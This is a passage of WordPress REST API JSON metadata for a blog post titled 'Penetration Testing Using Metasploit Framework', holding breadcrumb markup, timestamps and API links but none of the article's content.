06:10:16","updated":"2022-12-02 05:56:19"},"aioseo_breadcrumb":"<div class=\"aioseo-breadcrumbs\"><span class=\"aioseo-breadcrumb\">\n\t<a href=\"https:\/\/www.varutra.com\/varutravrt3\" title=\"Home\">Home<\/a>\n<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\t<a href=\"https:\/\/www.varutra.com\/varutravrt3\/category\/ethical-hacking\/\" title=\"Ethical Hacking\">Ethical Hacking<\/a>\n<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\tPenetration Testing Using Metasploit Framework\n<\/span><\/div>","aioseo_breadcrumb_json":[{"label":"Home","link":"https:\/\/www.varutra.com\/varutravrt3"},{"label":"Ethical Hacking","link":"https:\/\/www.varutra.com\/varutravrt3\/category\/ethical-hacking\/"},{"label":"Penetration Testing Using Metasploit Framework","link":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/"}],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/posts\/17976"}],"collection":[{"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/comments?post=17976"}],"version-history":[{"count":5,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/posts\/17976\/revisions"}],"predecessor-version":[{"id":20210,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/posts\/17976\/revisions\/20210"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/media\/17996"}],"wp:attachment":[{"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/media?parent=17976"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/categories?post=17976"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.varutra.com\/varutravrt3\/wp-json\/wp\/v2\/tags?post=17976"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}